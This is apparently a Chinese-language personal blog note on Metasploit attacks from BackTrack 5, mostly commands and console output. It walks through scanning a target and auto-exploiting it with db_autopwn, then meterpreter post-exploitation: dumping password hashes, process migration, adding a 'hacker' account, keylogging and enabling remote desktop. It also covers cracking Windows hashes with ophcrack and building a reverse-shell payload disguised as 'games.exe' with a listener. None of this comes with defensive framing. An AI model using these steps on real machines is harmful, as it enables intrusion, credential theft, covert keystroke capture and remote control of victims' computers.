bt5 note [5] msf运用层攻击

MSF 图形话界面:armitage

一、连环攻击

      hosts (代替了db_hosts)  (上次扫描的结果放入数据库,可以直接hosts -h查看更多选项)

      hosts -d (db_del_host 192.168.1.104 )  (清空数据库)

      services(代替了 db_services) (查看数据库服务)

     db_nmap

调用nmap来扫描,扫描后的信息保存到数据库,以便于自动攻击      

      db_nmap -T Aggressive -sV -n -o -v 192.168.1.104

           参数说明:

Aggressive 表示速率最快的 

-sV (service & version 判断服务和版本)

-n 不做DNS解析

-v 显示整个扫描结果


 db_autopwn -p -t -I 192.168.1.104 -e 

   稍等会就会执行了 

安装db_autopwn 自动攻击模块 
最新版本的msf没有了自动攻击模块,原因据说是会造成目标主机崩溃!
但很多时候这个功能还是挺方便的~
cd /opt/metasploit/msf3
svn update
下载db_autopwn.rb (http://download.csdn.net/detail/wuhualong1314/4421803)
copy到/opt/metasploit/msf3/plugins
进入msfconsole输入:load db_autopwn
这样就可以还原db_autopwn这一经典利用
如果你的MSF DB_autopwn出错误可以试试这个
#!/bin/sh
export BASE=`dirname $0`
export PATH="${BASE}/bin":$PATH
export LD_LIBRARY_PATH="${BASE}/lib":$LD_LIBRARY_PATH
export GEM_HOME="${BASE}/lib/ruby/gems/1.9.1/gems/"
export GEM_PATH="${BASE}/lib/ruby/gems/1.9.1/gems/"
unset MY_RUBY_HOME
unset RUBY_VERSION
unset RUBY_OPTS
 
"$@"
 
 
 
保存为 *.py 然后执行一下


    参数说明: 

-p 自动根据开发的端口 选择相应的模块

  -t  显示所有的匹配的漏洞模块 

-I  目标主机的范围

       -e 执行 

     

getuid

查看当前的用户

sysinfo

查看系统信息

run hashdump (当前用户必须对HKEY_LOCAL_MACHINE\SAM\SAM有访问权限,script requires the use of a SYSTEM user context (hint: migrate into service process,

但是 使用教主的BT5系统SAM 没有权限也可以 获取 很奇怪 )

获取账号的hash值 以便暴力破解

migrate PID (找到explore.exe这个高的进程 迁移进去 就可以从普通帐户到管理员了, 我现在是没有账号,

但是我现在已经是管理员登录的了,就可以创建一个管理员的账号,但是最好是 把管理员的权限克隆给内建账户 如guest,但是也可以是su hidden)


 
 

添加用户 run getgui -u hacker -p 123 (meterpreter下)

keysan_start (键盘扫描)

keyscan_dump (查看键盘输入)

keyscan_stop (停止键盘记录)

run getgui -e(打开远程桌面 : 也就是计算机-属性-高级-允许对方远程桌面连接连接 和 Terminal Services service start)

rdesttop 192.168.1.104 运行远程桌面

ophcrack

暴力破解,专门针对micro的系统

ophcrack -g -d /home/tables_xp_free_small/ -t /home/tables_xp_free_small/ -f /home/sam_value

彩虹表: 

    http://115.com/file/beneym39#tables-xp-free-fast.zip

    http://115.com/file/an8nvq0k#tables-xp-free-small.zip

二、离线攻击

msfpayload

       生成负载 服务器程序 

       =》msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.0.107 LPORT=3333 X > /home/tmp/games.exe

     建立服务器

     

msf > use exploit/multi/handler
msf  exploit(handler) > show options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target


msf  exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf  exploit(handler) > set LHOST 192.168.0.107
LHOST => 192.168.0.107
msf  exploit(handler) > set LPORT 3333
LPORT => 3333
msf  exploit(handler) > show optionso
[-] Invalid parameter "optionso", use "show -h" for more information
msf  exploit(handler) > show options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique: seh, thread, process, none
   LHOST     192.168.0.107    yes       The listen address
   LPORT     3333             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target


msf  exploit(handler) > exploit -j

其实就和灰鸽子一个道理 建立反向连接 去控制



你可能感兴趣的:(数据库,Ruby,Path,library,破解,BT)